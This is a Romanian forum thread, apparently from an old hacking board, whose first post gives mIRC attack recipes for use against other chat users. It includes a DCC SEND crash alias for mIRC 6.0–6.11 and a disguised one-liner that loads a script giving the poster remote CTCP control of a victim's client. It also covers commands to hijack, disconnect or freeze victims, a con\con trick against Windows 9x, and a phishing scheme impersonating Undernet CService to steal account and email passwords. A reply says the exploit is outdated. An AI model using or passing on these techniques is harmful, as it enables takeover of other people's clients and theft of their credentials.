Jump to content
zbeng

mirc exploit flod sau cum vreti voi

Recommended Posts

Hai sa fim si noi smecheri, si daca ala care a facut mircu ... a fost prost si noi am gasit un exploit pentru el....sa ne distram cu el, deci trebuie sa scrieti comanda :

/alias /hit //quote PRIVMSG $$1 : $ $chr(1) $ DCC SEND " $ $str(x $chr(0160),100) $

dupa ce ati scris comanda asta nu va mai ramane nimic de facut ( cand nu aveti ce face sau va enerveaza ceva persoane de pe un canal)decat sa sa scrieti comanda :

/hit nick/canal

si o sa vedeti cum pica acea persoana sau mai multe persoane de pe acel canal , cu conditia ca ei sa foloseasca versiunea de mirc 6.0 ; 6.1 ; 6.2 ; 6.3 ; 6.4 ; 6.5 ; 6.6 ; 6.7 ; 6.8 ; 6.9 ; 6.10 ; 6.11 . dar sa nu aiba versiunea 6.12 care deja este securizata . Dar ca sa fim si mai smecheri hai sa ne protejam noi sa nu ne poata pica altii ... pentru asta trebuie sa scrieti comanda : /ignore -wd * . Problema ii ca daca si altii stiu comanda de ignore, chiar si daca au o vers. de mirc din cele mentionate mai sus tot nu`l poti pica... dar... merita sa incerci .

Fraierii de pe Mirc pot fi si mai fraieri daca ii ajutati putin. CUM? Simplu.

Prin intermediul unei comenzi puteti sa ii controlati mircul in intregime. Nu trebuie decat sa ii pui sa scrie urmatoarea comanda si prin intermediul unor altor comenzi simple va jucati cu mircul lui.

Acum sa nu mai stau la vorbaraie si sa va dau comanda: //me :) | write -c x ctcp 1:*:@$1- | //me : | .load -rs x

Odata ce a scris comanda vor aparea in locul in care a scris-o urmatoarele semne:

:)

:

Dupa ele stiti ca victima a pus comanda ! Odata ce a pus-o veti avea acces ctcp pe toate comenzile mircului!!!

Acum folositi urmatoarele comenzi :

/ctcp nick /msg nick-sau-canal mesaj aceasta va face ca prin intermediul nickului victimei sa scrietzi ce text vreti unde vreti!!!

/ctcp nick /join #canal aceasta comanda va face ca victima sa intre pe canalul dorit;

/ctcp nick /part #canal aceasta comanda va face ca victima sa iasa de pe canalul dorit;

/ctcp nick /disconnect aceasta comanda va face ca victima sa iasa de pe MIRC;

/ctcp nick /join #6,0 aceasta comanda va face ca victima sa iasa de pe toate canalele pe care se afla;

/ctcp nick /clearscreen aceasta comanda ii va sterge victimei tot scrisul din mirc.. astfel nu va mai vedea nimik din ce a vorbit

Ati prins ideea? Ma bucur.. dar mai am o comanda frumoasa in caz ca victima v-a injurat sau enervat prea mult:

/ctcp nick /run c:concon Aceasta comanda ii va bloca automat calc (ATENTIE: merge numai pe 98, 95 ,Me).

NOTA: Daca personana e suspecta de comanda de mai sus puteti incerca direct /run c:concon si ii vetzi bloca direct copmuterul.

SFAT: Nu ezitati niciodata sa folositzi mesaje cat mai atractive pentru acea comanda .

Pentru ca fraierii de pe mirc sunt chiar foarte fraieri (cel putin unii, ca mai sunt si exceptii) puteti sa ii pacaliti prin intermediul mesajelor folosind /ame mesaj(scrie acelasi mesaj pe toate canalele) sau /notice #canal-sau-nick mesaj(notifica un canal sau o persoana cu un mesaj) sau chiar scriindu-i in privat un mesaj.

Pentru aceasta va voi da mai multe exemple:

1. Sa incepem cu comanda //me :) | write -c x ctcp 1:*:@$1- | //me : | .load -rs x :

- in ea putetzi modifica scrisul :) si : asa ca o idee si scoateti un mesaj ca sa fraieriti victima. Cum ar fi:

//me mp3-list | write -c x ctcp 1:*:@$1- | //me *.mp3 | .load -rs x ar face sa kreada ca victima iti va vedea mp3-urile tale... insa nu e destul; mai trebuie sa interveniti si voi cu un mesaj.. Astfel avem un exemplu complet:

Daca vreti sa imi vedeti lista de mp3uri scrietzi comanda: //me mp3-list | write -c x ctcp 1:*:@$1- | //me *.mp3 | .load -rs x

Daca vreti sa vedeti lista de usere de pe Undernet cu tot cu parole scrieti comanda: //me vreau user | write -c x ctcp 1:*:@$1- | //msg snakexp user | .load -rs x

Daca vrei access pe #romania pe #bucuresti si orice alte canale scrieti comanda: //me vreau access aici| write -c x ctcp 1:*:@$1- | //msg user access | .load -rs x

Daca vreti mai multe exemple doar ganditi-va si veti gasi !

2. Acum sa va dau ceva mai interesant : Cum furatzi usere sub nasul vitimelor.

Presupun ca va ganditi la metode de hacking complicate si grele.. dar totul e mai mult decat simplu. Totul se intampla prin intermediul unui mesaj. Mai intai schimbati-va nickul in Cserv1ce sau Cs3rvice sau ceva asemanantor: Acum scrieti urmatorul mesaj prin notice pe cat mai multe canale:

/notice #canal Din cauza de prea multe usere serverul undernet este laguit, asa ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu ti se suspende scrie urmatoarea comanda /msg nickul-tau(Cserv1ce sau Cs3rvice) $un-suspend me | username |password

Astfel fraierul iti va da propia parola la user ! Insa el isi poate recupera parola de la mailul sau asa ca incercati sa cereti si parola de la mail !!!

Pentru cei care nu folosesc Mircu delok am sa le dau toate detaliile in caz ca vreti sa va bateti joc de niste fraieri:

Deci dupa ce ati intrat pe mirc, intrati pe cat mai multe canale si bagati comanda de mai sus ! Dar mai intai scrieti

/nick Cserv1ce ca sa va schimbati nickul in Cserv1ce. Sa zicem ca intrati pe canalul #hack si vretzi sa bagatzi mesajul pentru furat usere.. comanda va fi in cazul asta: /notice # Din cauza de prea multe usere serverul undernet este laguit, asa ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu ti se suspende scrie urmatoarea comanda /msg Cserv1ce $un-suspend me | username | password . Acum trebuie sa prindeti fraierii care iti vor da mesaj userul si passul . In caz ca ai primit un mesaj din acesta ai prins un fraier .. Insa atentzie ca mai sunt care dau la panarama user si pass.

Link to comment
Share on other sites

<div class='quotetop'>QUOTE("zbeng")</div>

Daca vrei access pe #romania pe #bucuresti si orice alte canale scrieti comanda: //me vreau access aici| write -c x ctcp 1:*Question$1- | //msg user access | .load -rs x

tu chiar crezi ca tot ce zboara se mananca nu ? :) hai sa fim seriosi chiar crezi ca un operator de pe un canal de talia #romania sau #bucuresti ar cadea plasa in asa ceva ? cata naivitate ...

cat despre acel exploit de DCC vreau sa`ti spun ca il fumam acum cativa ani bunicei :)

deja au iesit prea multe update-uri la mIRC ca sa mai mearga exploitu ala :D

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...